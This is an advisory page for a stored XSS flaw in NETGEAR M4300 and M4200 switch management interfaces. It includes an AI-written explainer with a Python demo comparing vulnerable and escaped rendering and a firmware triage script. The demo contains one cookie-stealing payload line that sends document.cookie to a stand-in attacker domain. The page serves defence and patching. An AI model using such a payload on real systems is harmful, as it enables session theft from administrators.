VYPR
Unrated severity · NVD Advisory · Published Apr 20, 2020 · Updated Aug 5, 2024

CVE-2017-18827

Description

Certain NETGEAR devices are affected by stored XSS. This affects M4300-28G before 12.0.2.15, M4300-52G before 12.0.2.15, M4300-28G-POE+ before 12.0.2.15, M4300-52G-POE+ before 12.0.2.15, M4300-8X8F before 12.0.2.15, M4300-12X12F before 12.0.2.15, M4300-24X24F before 12.0.2.15, M4300-24X before 12.0.2.15, M4300-48X before 12.0.2.15, and M4200 before 12.0.2.15.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

A stored cross-site scripting (XSS) vulnerability in several NETGEAR fully managed switches allows authenticated users to inject malicious scripts via the web interface.

Vulnerability

A stored cross-site scripting (XSS) vulnerability exists in the web management interface of multiple NETGEAR fully managed switch models. Affected models include M4300-28G, M4300-52G, M4300-28G-POE+, M4300-52G-POE+, M4300-8X8F, M4300-12X12F, M4300-24X24F, M4300-24X, M4300-48X, and M4200 running firmware versions prior to 12.0.2.15 [1]. The vulnerability allows an attacker to store script code on the device that later executes in the browser of an administrator who views the affected page.

Exploitation

Exploitation requires an authenticated session on the switch's web management interface with privileges to write at least one field that the interface stores and later renders without output encoding. The attacker saves a script payload in that field; each time another user, including an administrator, opens the page that displays it, the payload runs in that user's browser under the user's session, so it can issue any request to the switch that the victim is authorized to make. Because the payload is stored on the device rather than carried in a single crafted link, it keeps firing on every page load until the value is removed [1].
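The render-time flaw described above, shown as an added example in Python rather than as the switch's own code: a stored "port description" field (an assumption; the advisory does not name the injectable field) is interpolated raw into a management page by the vulnerable renderer and HTML-escaped by the hardened one. The configuration store, page layout, port names and payload are all constructed for the demonstration.

```python
"""Stored XSS in a switch management page: vulnerable vs. hardened rendering.

Added illustration, not NETGEAR firmware code. The advisory does not say which
field is injectable; the "port description" field, the in-memory config store,
the page layout and the payload below are all assumptions.
"""
import html
import re

# Constructed stand-in for the switch's configuration store.
CONFIG = {"ports": {}}


def save_port_description(port, description):
    """Persist a user-supplied description. This is the "stored" half of stored
    XSS: storing raw text is not the bug, rendering it unencoded later is."""
    CONFIG["ports"][port] = description


def render_port_table_vulnerable():
    """Vulnerable renderer: stored text is interpolated straight into HTML, so
    any markup an earlier user saved runs in the next viewer's browser."""
    rows = "".join(
        f"<tr><td>{port}</td><td>{desc}</td></tr>"
        for port, desc in sorted(CONFIG["ports"].items())
    )
    return f"<table>{rows}</table>"


def render_port_table_hardened():
    """Hardened renderer: every stored value is HTML-escaped at output time.
    quote=True also encodes quotes, so a value placed inside an attribute
    cannot break out of it either."""
    rows = "".join(
        f"<tr><td>{html.escape(port, quote=True)}</td>"
        f"<td>{html.escape(desc, quote=True)}</td></tr>"
        for port, desc in sorted(CONFIG["ports"].items())
    )
    return f"<table>{rows}</table>"


# Coarse check used only to compare the two renderers: a raw tag that can carry
# script anywhere in the page. Escaped output contains "&lt;" instead of "<".
_SCRIPT_BEARING_TAG = re.compile(r"<(script|img|svg|iframe)\b", re.IGNORECASE)


def carries_injected_markup(page):
    return _SCRIPT_BEARING_TAG.search(page) is not None


# Constructed payload of the kind an authenticated user could save; it sends the
# viewing administrator's cookie to a reserved example domain.
PAYLOAD = '<img src=x onerror="location=\'https://attacker.example/?c=\'+document.cookie">'


def demo():
    """Store a benign and a malicious description, then render both ways.
    Returns (vulnerable_page_executes, hardened_page_executes)."""
    save_port_description("1/0/1", "uplink to core")
    save_port_description("1/0/2", PAYLOAD)
    return (
        carries_injected_markup(render_port_table_vulnerable()),
        carries_injected_markup(render_port_table_hardened()),
    )


if __name__ == "__main__":
    print(demo())  # (True, False)
```

Output encoding at the exact point where stored data is written into the page is the standard fix for stored XSS; escaping on input is not a substitute, because the same value may later be emitted into an attribute, a script block or a JSON response where HTML escaping is the wrong encoding. A restrictive Content-Security-Policy on management pages limits what an injected script can do if encoding is missed somewhere.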

Impact

Successful exploitation lets the attacker run arbitrary JavaScript in the victim's browser within the origin of the switch's web interface. From there the script can read or replay the victim's session, read any data the management pages display, alter what those pages show, or submit configuration requests with the victim's privileges. The CVSS v3 score is 5.2 (Medium), vector AV:L/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L: the attacker needs high privileges and a victim has to view the page, the scope is changed because the script executes in the administrator's browser rather than on the switch itself, and the confidentiality, integrity and availability impacts are each rated low [1].

Mitigation

The vulnerability is fixed in firmware version 12.0.2.15 for all affected M4300 and M4200 series models. NETGEAR strongly recommends upgrading to the latest firmware by downloading it from the NETGEAR Support website and following the installation instructions. No workarounds are provided other than applying the firmware update [1].
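A fleet check against the fixed version named above, as an added example and not a NETGEAR tool: it takes (hostname, model, firmware) tuples, compares the firmware numerically with 12.0.2.15 for the models the advisory lists, and ignores everything else. The inventory lines are constructed, and the script assumes the firmware version is reported as a dotted numeric string.

```python
"""Fleet check for CVE-2017-18827: which switches still run affected firmware?

Added example, not a NETGEAR tool. Model names and the fixed version 12.0.2.15
come from the advisory; the inventory below is constructed, and firmware versions
are assumed to be dotted numeric strings.
"""

FIXED_VERSION = "12.0.2.15"

AFFECTED_MODELS = {
    "M4300-28G", "M4300-52G", "M4300-28G-POE+", "M4300-52G-POE+",
    "M4300-8X8F", "M4300-12X12F", "M4300-24X24F", "M4300-24X",
    "M4300-48X", "M4200",
}


def parse_version(text):
    """Turn '12.0.2.15' into (12, 0, 2, 15) so comparison is numeric.
    A lexical compare would order '12.0.10.1' before '12.0.2.15' and wrongly
    flag a patched switch as affected."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised firmware version: {text!r}")
    return tuple(int(p) for p in parts)


def is_affected(model, version):
    """True if the model is in the advisory's list and its firmware predates the fix.
    Unknown or out-of-scope models are never flagged."""
    if model.strip().upper() not in AFFECTED_MODELS:
        return False
    return parse_version(version) < parse_version(FIXED_VERSION)


def triage(inventory):
    """inventory: iterable of (hostname, model, version).
    Returns the sorted hostnames that still need the 12.0.2.15 upgrade."""
    return sorted(host for host, model, version in inventory if is_affected(model, version))


# Constructed sample inventory; versions other than 12.0.2.15 are illustrative.
SAMPLE_INVENTORY = [
    ("core-sw1", "M4300-48X", "12.0.2.15"),      # exactly the fixed version: not affected
    ("core-sw2", "M4300-48X", "12.0.2.7"),       # older: affected
    ("dist-sw1", "M4300-12X12F", "12.0.10.1"),   # lexically "smaller" but numerically newer
    ("edge-sw1", "M4200", "12.0.1.9"),           # older: affected
    ("edge-sw2", "GS724T", "6.3.1.19"),          # not a model the advisory lists
]

if __name__ == "__main__":
    for host in triage(SAMPLE_INVENTORY):
        print(f"{host}: upgrade to {FIXED_VERSION}")
```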

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 3

References: 1